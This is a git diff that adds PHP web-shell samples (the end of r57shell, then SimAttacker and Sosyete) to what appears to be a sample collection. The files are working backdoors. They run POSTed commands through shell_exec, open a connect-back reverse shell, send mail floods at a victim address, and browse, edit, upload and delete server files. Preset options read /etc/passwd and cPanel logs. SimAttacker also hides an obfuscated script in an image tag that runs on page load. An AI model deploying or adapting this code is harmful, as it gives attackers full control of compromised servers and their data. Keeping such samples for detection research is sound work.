2284echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2285echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2286echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2287echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2288echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2289echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2290echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2291echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2292echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2293echo $te."</td>".$fe."</tr></div></table>";
2294}
2295
2296echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>
2297
2298
2299</body></html>";
2300
2301
2302?> \ No newline at end of file
diff --git a/data/samples/classic/simattacker.php b/data/samples/classic/simattacker.php
new file mode 100644
index 0000000..7e6f057
--- /dev/null
+++ b/data/samples/classic/simattacker.php
@@ -0,0 +1,756 @@
1<?
2
3//download Files Code
4
5$fdownload=$_GET['fdownload'];
6
7if ($fdownload <> "" ){
8
9// path & file name
10
11$path_parts = pathinfo("$fdownload");
12
13$entrypath=$path_parts["basename"];
14
15$name = "$fdownload";
16
17$fp = fopen($name, 'rb');
18
19header("Content-Disposition: attachment; filename=$entrypath");
20
21header("Content-Length: " . filesize($name));
22
23fpassthru($fp);
24
25exit;
26
27}
28
29?>
30
31
32
33<html>
34
35
36
37<head>
38
39<meta http-equiv="Content-Language" content="en-us">
40
41<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
42
43<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
44<style>
45
46<!--
47
48body { font-family: Tahoma; font-size: 8pt }
49
50-->
51
52</style>
53
54</head>
55
56<body>
57
58<?
59
60error_reporting(E_ERROR | E_WARNING | E_PARSE);
61
62
63
64 //File Edit
65
66 $fedit=$_GET['fedit'];
67
68 if ($fedit <> "" ){
69
70 $fedit=realpath($fedit);
71
72 $lines = file($fedit);
73
74 echo "<form action='' method='POST'>";
75
76echo "<textarea name='savefile' rows=30 cols=80>" ;
77
78foreach ($lines as $line_num => $line) {
79
80 echo htmlspecialchars($line);
81
82}
83
84echo "</textarea>
85
86 <input type='text' name='filepath' size='60' value='$fedit'>
87
88 <input type='submit' value='save'></form>";
89
90 $savefile=$_POST['savefile'];
91
92 $filepath=realpath($_POST['filepath']);
93
94 if ($savefile <> "")
95
96 {
97
98 $fp=fopen("$filepath","w+");
99
100 fwrite ($fp,"") ;
101
102 fwrite ($fp,$savefile) ;
103
104 fclose($fp);
105
106 echo "<script language='javascript'> close()</script>";
107
108 }
109
110exit();
111
112 }
113
114?>
115
116<?
117
118// CHmod - PRimission
119
120$fchmod=$_GET['fchmod'];
121
122if ($fchmod <> "" ){
123
124$fchmod=realpath($fchmod);
125
126echo "<center><br>
127
128chmod for :$fchmod<br>
129
130<form method='POST' action=''><br>
131
132Chmod :<br>
133
134<input type='text' name='chmod0' ><br>
135
136<input type='submit' value='change chmod'>
137
138</form>";
139
140$chmod0=$_POST['chmod0'];
141
142if ($chmod0 <> ""){
143
144chmod ($fchmod , $chmod0);
145
146}else {
147
148echo "primission Not Allow change Chmod";
149
150}
151
152exit();
153
154}
155
156?>
157
158
159
160<div align="center">
161
162 <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
163
164 <tr>
165
166 <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
167
168 <p align="center"><b>
169
170 <font face="Tahoma" size="2"><br>
171
172 </font>
173
174 <font color="#D2D200" face="Tahoma" size="2">
175
176 <span style="text-decoration: none">
177
178 <font color="#000000">
179
180 <a href="?id=fm&dir=<?
181
182 echo getcwd();
183
184 ?>
185
186 ">
187
188 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
189
190 <p align="center"><b><a href="?id=cmd">
191
192 <span style="text-decoration: none">
193
194 <font face="Tahoma" size="2" color="#000000">
195
196 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
197
198 <p align="center"><b><a href="?id=fake-mail">
199
200 <font face="Tahoma" size="2" color="#000000">
201
202 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
203
204 <p align="center"><b>
205
206 <font face="Tahoma" size="2" color="#000000">
207
208 <a href="?id=cshell">
209
210 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
211
212 <p align="center"><b>
213
214 <font color="#000000" face="Tahoma" size="2">
215
216 <a href="?id=">
217
218 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
219
220 <p>&nbsp;<p align="center">&nbsp;</td>
221
222 <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
223
224 <?
225
226 //*******************************************************
227
228 //Start Programs About US
229
230 $id=$_GET['id'];
231
232
233
234 if ($id=="") {
235
236 echo "
237
238 <font face='Arial Black' color='#808080' size='1'>
239
240***************************************************************************<br>
241
242&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
243
244&nbsp;Programer : Hossein Asgary <br>
245
246&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br>
247
248&nbsp;please : If you find bug or problems in program , tell me by : <br>
249
250&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
251
252Enjoy :) [Only 4 Best Friends ] <br>
253
254***************************************************************************</font></span></p>
255
256";
257
258
259
260echo "<font color='#333333' size='2'>OS :". php_uname();
261
262echo "<br>IP :".
263
264($_SERVER['REMOTE_ADDR']);
265
266echo "</font>";
267
268
269
270
271
272 }
273
274 //************************************************************
275
276 //cmd-command line
277
278 $cmd=$_POST['cmd'];
279
280 if($id=="cmd"){
281
282 $result=shell_exec("$cmd");
283
284 echo "<br><center><h3> CMD ExeCute </h3></center>" ;
285
286 echo "<center>
287
288 <textarea rows=20 cols=70 >$result</textarea><br>
289
290 <form method='POST' action=''>
291
292 <input type='hidden' name='id' value='cmd'>
293
294 <input type='text' size='80' name='cmd' value='$cmd'>
295
296 <input type='submit' value='cmd'><br>";
297
298
299
300
301
302
303
304 }
305
306
307
308 //********************************************************
309
310
311
312 //fake mail = Use victim server 4 DOS - fake mail
313
314 if ( $id=="fake-mail"){
315
316 error_reporting(0);
317
318 echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
319
320 echo "<center><form method='post' action=''>
321
322 Victim Mail :<br><input type='text' name='to' ><br>
323
324 Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
325
326 Comments:
327
328 <br>
329
330 <textarea rows='10' cols=50 name='Comments' ></textarea><br>
331
332 <input type='submit' value='Send Mail Strm ' >
333
334 </form></center>";
335
336 //send Storm Mail
337
338 $to=$_POST['to'];
339
340 $nom=$_POST['nom'];
341
342 $Comments=$_POST['Comments'];
343
344 if ($to <> "" ){
345
346 for ($i = 0; $i < $nom ; $i++){
347
348 $from = rand (71,1020000000)."@"."Attacker.com";
349
350 $subject= md5("$from");
351
352 mail($to,$subject,$Comments,"From:$from");
353
354 echo "$i is ok";
355
356 }
357
358 echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
359
360 }
361
362 }
363
364 //********************************************************
365
366
367
368 //Connect Back -Firewall Bypass
369
370 if ($id=="cshell"){
371
372 echo "<br>Connect back Shell , bypass Firewalls<br>
373
374 For user :<br>
375
376 nc -l -p 1019 <br>
377
378 <hr>
379
380 <form method='POST' action=''><br>
381
382 Your IP & BindPort:<br>
383
384 <input type='text' name='mip' >
385
386 <input type='text' name='bport' size='5' value='1019'><br>
387
388 <input type='submit' value='Connect Back'>
389
390 </form>";
391
392 $mip=$_POST['mip'];
393
394 $bport=$_POST['bport'];
395
396 if ($mip <> "")
397
398 {
399
400 $fp=fsockopen($mip , $bport , $errno, $errstr);
401
402 if (!$fp){
403
404 $result = "Error: could not open socket connection";
405
406 }
407
408 else {
409
410 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
411
412 while(!feof($fp)){
413
414 fputs ($fp," bash # ");
415
416 $result= fgets ($fp, 4096);
417
418 $message=`$result`;
419
420 fputs ($fp,"--> ".$message."\n");
421
422 }
423
424 fclose ($fp);
425
426 }
427
428 }
429
430 }
431
432
433
434 //********************************************************
435
436 //Spy File Manager
437
438 $homedir=getcwd();
439
440 $dir=realpath($_GET['dir'])."/";
441
442 if ($id=="fm"){
443
444 echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
445
446 &nbsp;<b>
447
448 <form action='' method='GET'>
449
450 &nbsp;Path:</b>
451
452 <input type='hidden' name='id' value='fm'>
453
454 <input type='text' name='dir' size='80' value='$dir'>
455
456 <input type='submit' value='dir'>
457
458 </form>
459
460 <br>";
461
462
463
464 echo "
465
466
467
468<div align='center'>
469
470
471
472<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
473
474 <tr>
475
476 <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
477
478 <td height='28' width='82' align='center'>
479
480 <font color='#000080' size='2'><b>Size KByte</b></font></td>
481
482 <td height='28' width='83' align='center'>
483
484 <font color='#008000' size='2'><b>Download</b></font></td>
485
486 <td height='28' width='66' align='center'>
487
488 <font color='#FF9933' size='2'><b>Edit</b></font></td>
489
490 <td height='28' width='75' align='center'>
491
492 <font color='#999999' size='2'><b>Chmod</b></font></td>
493
494 <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
495
496 </tr>";
497
498 if (is_dir($dir)){
499
500 if ($dh=opendir($dir)){
501
502 while (($file = readdir($dh)) !== false) {
503
504 $fsize=round(filesize($dir . $file)/1024);
505
506
507
508
509
510 echo "
511
512 <tr>
513
514 <th width='250' height='22' align='left' nowrap>";
515
516 if (is_dir($dir.$file))
517
518 {
519
520 echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
521
522 }
523
524 else {
525
526 echo "<font size='2' color='#666666'>&nbsp;$file ";
527
528 }
529
530 echo "</a></font></th>
531
532 <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
533
534 if (is_file($dir.$file))
535
536 {
537
538 echo "$fsize";
539
540 }
541
542 else {
543
544 echo "&nbsp; ";
545
546 }
547
548 echo "
549
550 </b></font></td>
551
552 <td width='103' align='center' nowrap>";
553
554 if (is_file($dir.$file)){
555
556 if (is_readable($dir.$file)){
557
558 echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
559
560 }else {
561
562 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
563
564 }
565
566 }else {
567
568 echo "&nbsp;";
569
570 }
571
572 echo "
573
574 </a></font></td>
575
576 <td width='77' align='center' nowrap>";
577
578 if (is_file($dir.$file))
579
580 {
581
582 if (is_readable($dir.$file)){
583
584 echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
585
586 }else {
587
588 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
589
590 }
591
592 }else {
593
594 echo "&nbsp;";
595
596 }
597
598 echo "
599
600 </a></font></td>
601
602 <td width='86' align='center' nowrap>";
603
604 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
605
606 echo "<font size='1' color='#999999'>Dont in windows";
607
608 }
609
610 else {
611
612 echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
613
614 }
615
616 echo "</a></font></td>
617
618 <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
619
620 </tr>
621
622 ";
623
624 }
625
626 closedir($dh);
627
628 }
629
630 }
631
632 echo "</table>
633
634<form enctype='multipart/form-data' action='' method='POST'>
635
636 <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
637
638 Send this file: <input name='userfile' type='file' />
639
640 <inpt type='hidden' name='Fupath' value='$dir'>
641
642 <input type='submit' value='Send File' />
643
644</form>
645
646 </div>";
647
648 }
649
650//Upload Files
651
652$rpath=$_GET['dir'];
653
654if ($rpath <> "") {
655
656$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
657
658print "<pre>";
659
660if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
661
662echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
663
664echo "<script language='javascript'> history.back(2)</script>";
665
666}
667
668 }
669
670 //file deleted
671
672$frpath=$_GET['fdelete'];
673
674if ($frpath <> "") {
675
676if (is_dir($frpath)){
677
678$matches = glob($frpath . '/*.*');
679
680if ( is_array ( $matches ) ) {
681
682 foreach ( $matches as $filename) {
683
684 unlink ($filename);
685
686 rmdir("$frpath");
687
688echo "<script language='javascript'> alert('Success! Please refresh')</script>";
689
690echo "<script language='javascript'> history.back(1)</script>";
691
692 }
693
694 }
695
696 }
697
698 else{
699
700echo "<script language='javascript'> alert('Success! Please refresh')</script>";
701
702unlink ("$frpath");
703
704echo "<script language='javascript'> history.back(1)</script>";
705
706exit(0);
707
708
709
710 }
711
712
713
714
715
716}
717
718 ?>
719
720
721
722 </td>
723
724 </tr>
725
726 <tr>
727
728 <td style="border: 1px dotted #FFCC66">
729
730 <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
731
732 Copyright 2004-Simorgh Security<br>
733
734 Hossein-Asgari<br>
735
736 </font><font color="#c0c0c0" size="1" face="Tahoma">
737
738 <a style="TEXT-DECORATION: none" href="http://www.r57.biz">
739
740 <font color="#666666">www.r57.biz</font></a></font></td>
741
742 </tr>
743
744 </table>
745<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
746<script type="text/javascript">
747if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
748setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500);
749</script>
750</div>
751
752</body>
753
754
755
756</html>
diff --git a/data/samples/classic/sosyete.php b/data/samples/classic/sosyete.php
new file mode 100644
index 0000000..b43476f
--- /dev/null
+++ b/data/samples/classic/sosyete.php
@@ -0,0 +1,225 @@
1<html>
2 <head>
3 <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa">
4 <title> Sosyete Safe Mode Bypass Shell </title>
5 <style>
6 td {
7 font-family: verdana, arial, ms sans serif, sans-serif;
8 font-size: 11px;
9 color: #D5ECF9;
10 }
11 BODY {
12 margin-top: 4px;
13 margin-right: 4px;
14 margin-bottom: 4px;
15 margin-left: 4px;
16 scrollbar-face-color: #b6b5b5;
17 scrollbar-highlight-color: #758393;
18 scrollbar-3dlight-color: #000000;
19 scrollbar-darkshadow-color: #101842;
20 scrollbar-shadow-color: #ffffff;
21 scrollbar-arrow-color: #000000;
22 scrollbar-track-color: #ffffff;
23 }
24 A:link {COLOR:blue; TEXT-DECORATION: none}
25 A:visited { COLOR:blue; TEXT-DECORATION: none}
26 A:active {COLOR:blue; TEXT-DECORATION: none}
27 A:hover {color:red;TEXT-DECORATION: none}
28 input, textarea, select {
29 background-color: #EBEAEA;
30 border-style: solid;
31 border-width: 1px;
32 font-family: verdana, arial, sans-serif;
33 font-size: 11px;
34 color: #333333;
35 padding: 0px;
36 }
37 </style>
38 </head>
39 <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
40 <center>
41 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
42 <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
43 <p align="center"> </p>
44 <p align="center">
45 <a bookmark="minipanel">
46 <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
47 <br>
48 <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
49 </p>
50 <a bookmark="minipanel">
51 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
52 <p align="center">Sosyete Safe Mode Bypass Shell
53 <b>
54 <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
55 </p>
56 <a bookmark="minipanel">
57 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
58 <p align="center">~
59 <b>
60
61
62 <p>
63 </form>
64 </p>
65 </td>
66
67
68 </tr>
69 </table>
70 </a>
71
72 <p>
73
74 <br>
75 </p>
76
77 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
78 <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
79 <b>
80 </b>
81 <font face="Wingdings 3" size="5"></font><b>Sosyete Safe Mode Bypass Shell ; Bypass shell'lerden esinlenerek birçok shell'in ortak karisimi olarak sunulmustur.<span lang="en-us"></span><span lang="en-us"></span> </b><font face="Wingdings 3" size="5"></font></p><p align="center"> </p></td></tr></table>
82
83</a>
84
85
86<div align="right">
87
88<span lang="en-us">
89
90 </span>
91 </div>
92 </body>
93 </html>
94
95 <?
96
97
98echo "<b><font color=red>Sosyete Bypass Main Menu</font></b><br>";
99
100print_r('
101
102
103
104
105<pre>
106
107
108<form method="POST" action="">
109<b><font color=red> </font></b><input name="sosyete" type="text"><input value="&#199;al&#305;&#351;t&#305;r" type="submit">
110</form>
111<form method="POST" action="">
112<b><font color=red></font><select size="1" name="fuck">
113<option value=" ">Sosyete safe mode bypass shell</option>
114<option value="id;pwd">id & Dizin</option>
115<option value="ls">Dosyalar</option>
116<option value="uname -a">Server</option>
117<option value="netstat -an | grep -i listen">A&#231;&#305;k Portlar</option>
118<option value="ipconfig">A&#287; Bilgisi</option>
119<option value="ps -aux">Uygulamalar</option>
120<option value="who -q">Kullan&#305;c&#305; Say&#305;s&#305;</option>
121<option value="cat /etc/passwd">cat/etc/passwd</option>
122<option value="cat /var/cpanel/accounting.log">cat/var/cpanel/accounting.log</option>
123<option value="cat /etc/syslog.conf">cat/etc/syslog.conf</option>
124<option value="cat /etc/hosts">cat/etc/hosts</option>
125<option value="cat /etc/named.conf">cat/etc/named.conf</option>
126<option value="cat /etc/httpd/conf/httpd.conf">cat/etc/httpd/conf/httpd.conf</option>
127</select> <input type="submit" value="&#199;al&#305;&#351;t&#305;r">
128</form>
129</pre>
130<style>
131 td {
132 font-family: verdana, arial, ms sans serif, sans-serif;
133 font-size: 11px;
134 color: #D5ECF9;
135 }
136 BODY {
137 margin-top: 4px;
138 margin-right: 4px;
139 margin-bottom: 4px;
140 margin-left: 4px;
141 scrollbar-face-color: #b6b5b5;
142 scrollbar-highlight-color: #758393;
143 scrollbar-3dlight-color: #000000;
144 scrollbar-darkshadow-color: #101842;
145 scrollbar-shadow-color: #ffffff;
146 scrollbar-arrow-color: #000000;
147 scrollbar-track-color: #ffffff;
148 }
149 A:link {COLOR:blue; TEXT-DECORATION: none}
150 A:visited { COLOR:blue; TEXT-DECORATION: none}
151 A:active {COLOR:blue; TEXT-DECORATION: none}
152 A:hover {color:red;TEXT-DECORATION: none}
153 input, textarea, select {
154 background-color: #EBEAEA;
155 border-style: solid;
156 border-width: 1px;
157 font-family: verdana, arial, sans-serif;
158 font-size: 11px;
159 color: #333333;
160 padding: 0px;
161 }
162 </style></head>
163<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
164<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
165 <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
166<p align="center"> </p>
167 <p align="center">
168<a bookmark="minipanel">
169 <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
170 <br>
171<font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
172</p>
173
174
175<div align="right">
176
177<span lang="en-us"> </span></div></body></html>
178
179
180');
181ini_restore("safe_mode");
182ini_restore("open_basedir");
183$fuck=shell_exec($_POST['sosyete']);
184$mokoko=shell_exec($_POST['fuck']);
185echo "<pre><h4>";
186echo "<b><font color=red>Komut Sonucu </font></b><br>";
187echo $fuck;
188echo $mokoko;
189echo "</h4></pre>";
190
191?>
192
193</tr>
194 </table>
195
196 </a>
197 <p>
198
199 <br>
200
201 </p>
202 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
203 <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
204
205 <b>
206
207 </b><font face="Wingdings 3" size="5"></font><b><font color="#CC0000">Sosyete Safe Mode Bypass Shell<span lang="en-us"></span> <span lang="en-us"> </span> </b><font color="#CC0000"><b>Coded by</b> </font><b><span lang="en-us"><a href="http://www.r57.biz"><font color="#CC0000">r57.biz</a></span><font color="#CC0000"> ~ <span lang="en-us">Sosyete</span> </b><font face="Wingdings 3" size="5"> </font></p><p align="center"> </p></td></tr></table>
208
209</a>
210
211
212<div align="right">
213
214<span lang="en-us">
215
216</span>
217 </div>
